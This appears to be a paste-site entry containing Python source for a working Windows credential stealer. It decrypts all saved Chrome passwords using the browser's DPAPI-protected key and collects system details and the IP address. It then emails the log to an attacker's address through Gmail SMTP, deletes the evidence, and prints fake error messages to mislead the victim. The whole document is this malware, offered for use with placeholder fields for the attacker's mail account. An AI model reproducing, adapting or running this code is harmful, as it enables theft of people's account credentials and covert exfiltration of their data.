TL6YVD44

· 4 years ago · Feb 09, 2021, 05:14 AM
1import random
2import string
3import requests
4import os
5import re
6import sys
7import base64
8import sqlite3
9import win32crypt
10from Cryptodome.Cipher import AES
11import shutil
12import csv
13import platform,socket,re,uuid,json,psutil,logging
14from selenium import webdriver
15import random
16import time
17import smtplib
18from email.mime.multipart import MIMEMultipart
19from email.mime.text import MIMEText
20from email.mime.base import MIMEBase
21from email import encoders
22from selenium.webdriver.chrome.options import Options
23
24uname = platform.uname()
25j1 = (f"System: {uname.system}","\n")
26j2=(f"Node Name: {uname.node}","\n")
27j3=(f"Release: {uname.release}","\n")
28j4=(f"Version: {uname.version}","\n")
29j5=(f"Machine: {uname.machine}","\n")
30j6=(f"Processor: {uname.processor}")
31hostname = socket.gethostname()
32
33ip_address = socket.gethostbyname(hostname)
34
35j7 = (f"IP Address: {ip_address}")
36
37
38CHROME_PATH_LOCAL_STATE = r"%s\AppData\Local\Google\Chrome\User Data\Local State" % (os.environ['USERPROFILE'])
39CHROME_PATH = r"%s\AppData\Local\Google\Chrome\User Data" % (os.environ['USERPROFILE'])
40
41
42def get_secret_key():
43    try:
44
45        with open(CHROME_PATH_LOCAL_STATE, "r", encoding='utf-8') as f:
46            local_state = f.read()
47            local_state = json.loads(local_state)
48        secret_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
49
50        secret_key = secret_key[5:]
51        secret_key = win32crypt.CryptUnprotectData(secret_key, None, None, None, 0)[1]
52        return secret_key
53    except Exception as e:
54        print('ERROR')
55        return None
56
57
58def decrypt_payload(cipher, payload):
59    return cipher.decrypt(payload)
60
61
62def generate_cipher(aes_key, iv):
63    return AES.new(aes_key, AES.MODE_GCM, iv)
64
65
66def decrypt_password(ciphertext, secret_key):
67    try:
68
69        initialisation_vector = ciphertext[3:15]
70
71        encrypted_password = ciphertext[15:-16]
72
73        cipher = generate_cipher(secret_key, initialisation_vector)
74        decrypted_pass = decrypt_payload(cipher, encrypted_password)
75        decrypted_pass = decrypted_pass.decode()
76        return decrypted_pass
77    except Exception as e:
78        print('LOADING')
79        print("LOADING")
80        return ""
81
82
83def get_db_connection(chrome_path_login_db):
84    try:
85
86        shutil.copy2(chrome_path_login_db, "Loginvault.db")
87        return sqlite3.connect("Loginvault.db")
88    except Exception as e:
89
90        return None
91
92
93if __name__ == '__main__':
94    try:
95
96        with open('passes.txt', mode='w', newline='') as decrypt_password_file:
97            csv_writer = csv.writer(decrypt_password_file, delimiter=',')
98            csv_writer.writerow(["index", "url", "username", "password"])
99
100            secret_key = get_secret_key()
101
102            folders = [element for element in os.listdir(CHROME_PATH) if
103                       re.search("^Profile*|^Default$", element) != None]
104            for folder in folders:
105
106                chrome_path_login_db = r"%s\%s\Login Data" % (CHROME_PATH, folder)
107                conn = get_db_connection(chrome_path_login_db)
108                if (secret_key and conn):
109                    cursor = conn.cursor()
110                    cursor.execute("SELECT action_url, username_value, password_value FROM logins")
111                    for index, login in enumerate(cursor.fetchall()):
112                        url = login[0]
113                        username = login[1]
114                        ciphertext = login[2]
115                        if (url != "" and username != "" and ciphertext != ""):
116
117                            decrypted_password = decrypt_password(ciphertext, secret_key)
118
119                            csv_writer.writerow([index, url, username, decrypted_password,"             SYTEM INFO                                             " f"System: {uname.system}","\n",f" Name: {uname.node}","\n"f"Release: {uname.release}","\n"f"Version: {uname.version}","\n"f"Machine: {uname.machine}","\n"f"Processor: {uname.processor}"f"IP Address: {ip_address}"],)
120
121                    cursor.close()
122                    conn.close()
123
124                    os.remove("Loginvault.db")
125    except Exception as e:
126        print("pass")
127
128
129mail_content = '''VICTIM INFO IN THE BELOW FILE
130'''
131
132sender_address = 'YOUR GMAIL'
133sender_pass = 'YOUR GMAIL PASSWORD'
134email_send = 'EMAIL TO SEND LOGS'
135
136message = MIMEMultipart()
137message['From'] = sender_address
138message['To'] = email_send
139message['Subject'] = 'LOG'
140
141message.attach(MIMEText(mail_content, 'plain'))
142attach_file_name = 'passes.txt'
143attach_file = open(attach_file_name, 'rb')
144payload = MIMEBase('application', 'octate-stream')
145payload.set_payload((attach_file).read())
146encoders.encode_base64(payload)
147payload.add_header('Content-Decomposition', 'attachment', filename=attach_file_name)
148message.attach(payload)
149
150session = smtplib.SMTP('smtp.gmail.com', 	587)
151session.starttls()
152session.login(sender_address, sender_pass)
153text = message.as_string()
154session.sendmail(sender_address, email_send,text)
155session.quit()
156print('SUCCESS')
157f = open("passes.txt", "r+")
158
159
160f.seek(0)
161
162
163f.truncate()
164print("STARTING")
165time.sleep(2)
166print("ERROR STARTING")